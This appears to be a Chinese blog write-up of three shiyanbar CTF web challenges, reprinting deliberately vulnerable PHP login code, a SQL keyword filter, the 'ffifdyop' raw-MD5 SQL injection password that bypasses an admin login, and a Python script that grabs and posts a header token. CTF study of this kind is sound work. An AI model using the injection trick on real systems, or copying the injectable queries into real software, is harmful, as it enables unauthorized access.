[实验吧]Web

字数 448阅读 63

简单的登录题

解题链接: [http://ctf5.shiyanbar.com/web/jiandan/index.php](javascript:;)

define("SECRET_KEY", '***********'); 
define("METHOD", "aes-128-cbc"); 
error_reporting(0); include('conn.php'); 
function sqliCheck($str){ 
if(preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)){ 
return 1; 
} 
return 0; } 
function get_random_iv(){ 
$random_iv=''; for($i=0;$i<16;$i++){ 
$random_iv.=chr(rand(1,255)); } 
return $random_iv; } 
function login($info){ 
$iv = get_random_iv(); 
$plain = serialize($info); 
$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv); 
setcookie("iv", base64_encode($iv)); 
setcookie("cipher", base64_encode($cipher)); } 
function show_homepage(){ 
global $link; if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){ 
$cipher = base64_decode($_COOKIE['cipher']); 
$iv = base64_decode($_COOKIE["iv"]); 
if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){ 
$info = unserialize($plain) or die("

base64_decode('".base64_encode($plain)."') can't unserialize
"); 
$sql="select * from users limit ".$info['id'].",0"; 
$result=mysqli_query($link,$sql); if(mysqli_num_rows($result)>0 or die(mysqli_error($link))){ 
$rows=mysqli_fetch_array($result); echo '
Hello!'.$rows['username'].'
'; } else{ echo '
Hello!
'; } }else{ die("ERROR!"); } } } if(isset($_POST['id'])){ 
$id = (string)$_POST['id'];
if(sqliCheck($id)) 
die("
sql inject detected!
"); 
$info = array('id'=>$id); login($info); echo '
Hello!
'; }else{ 
if(isset($_COOKIE["iv"])&&isset($_COOKIE['cipher'])){ 
show_homepage(); }else{ 
echo '
Login Form
input id to login

'; } }
  • 关键语句:
  1. sql语句:$sql="select * from users limit ".$info['id'].",0";
  2. 正则匹配:preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)
  • 未完待续。。。

后台登录

解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php

  • 源码:
<!-- $password=$_POST['password'];
    $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
    $result=mysqli_query($link,$sql);
        if(mysqli_num_rows($result)>0){
            echo 'flag is :'.$flag;
        }
        else{
            echo '密码错误!';
        } -->
  • post的密码要md5($password,true):
md5(string, raw):    
raw 可选,默认为false
true:返回16字符2进制格式
false:返回32字符16进制格式
简单来说就是 true将16进制的md5转化为字符了
  • 思路:md5(string,true)='or'****,则可以注入了

  • 看url:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
    md5(ffifdyop)(32字符16进制):276f722736c95d99e921722cf9ed621c
    利用16进制转字符
    md5(ffifdyop)(字符): 'or'6�]��!r,��b�(看别人的writeup是'or'6<trash>)
    后面出现乱码,不过,没关系,有'or'就行。

  • 将ffifdyop作为密码输入即可,sql语句变成了SELECT * FROM admin WHERE username = 'admin' and password = ''or'6�]��!r,��b�'

  • or 后面的'6�]��!r,��b�'为真。


  • flag{ffifdyop_has_trash}


天下武功唯快不破

看看响应头
http://ctf5.shiyanbar.com/web/10/10.php

  • 页面显示:
    There is no martial art is indefectible, while the fastest speed is the only way for long success.
    >>>>>>----You must do it as fast as you can!----<<<<<<
  • 响应头


    head.png
  • 有个FLAG,base64加密了,解密之后:
    P0ST_THIS_T0_CH4NGE_FL4G:o3DLpyFV4
  • 每次flag都会变,写python脚本:
import requests
import base64
url="http://ctf5.shiyanbar.com/web/10/10.php"
s=requests.Session()
response=s.get(url)
head=response.headers
print(head)
flag_1=str(base64.b64decode(head['flag']),encoding = "utf-8")
#base64解密之后是byte类型,要用str(a,encoding="utf-8"),转换成string类型,用于split()
flag=flag_1.split(':')[1]
print(flag)
postdata={'key':flag}#这里为什么是key参数,试出来的
result=s.post(url=url,data=postdata)
print(result.text)
  • 运行结果
    {'Server': 'Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29', 'Content-Length': '216', 'Date': 'Sun, 28 Jan 2018 09:04:09 GMT', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html', 'X-Powered-By': 'PHP/5.3.29', 'Keep-Alive': 'timeout=5, max=100', 'FLAG': 'UDBTVF9USElTX1QwX0NINE5HRV9GTDRHOklGQ09zOGVjdw=='}
    IFCOs8ecw
    CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}
    [Finished in 19.0s]
  • CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}